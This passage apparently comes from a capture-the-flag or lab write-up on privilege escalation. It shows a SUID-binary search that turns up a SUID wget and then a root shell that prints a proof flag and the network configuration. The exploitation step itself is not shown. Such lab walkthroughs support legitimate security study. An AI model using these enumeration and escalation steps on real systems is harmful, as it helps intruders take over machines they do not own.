Priv Esc
clumsyadmin@xposedapi:/home/clumsyadmin$ find / -type f -perm -04000 -ls 2>/dev/null
<yadmin$ find / -type f -perm -04000 -ls 2>/dev/null
273373 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
276719 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
398815 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
266035 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
262183 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
265710 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
276984 456 -rwsr-xr-x 1 root root 466496 Apr 5 2019 /usr/bin/wget
282583 36 -rwsr-xr-x 1 root root 34896 Apr 22 2020 /usr/bin/fusermount
266037 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
262179 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
262180 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
265563 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
272436 156 -rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
262182 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
bash-5.0# whoami && cat /root/proof.txt && ip addr
whoami && cat /root/proof.txt && ip addr
root
a2ac32aa193d0d7634ea5742e51ce05c
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:bf:e3:d5 brd ff:ff:ff:ff:ff:ff
inet 192.168.214.134/24 brd 192.168.214.255 scope global ens192
valid_lft forever preferred_lft forever
Last updated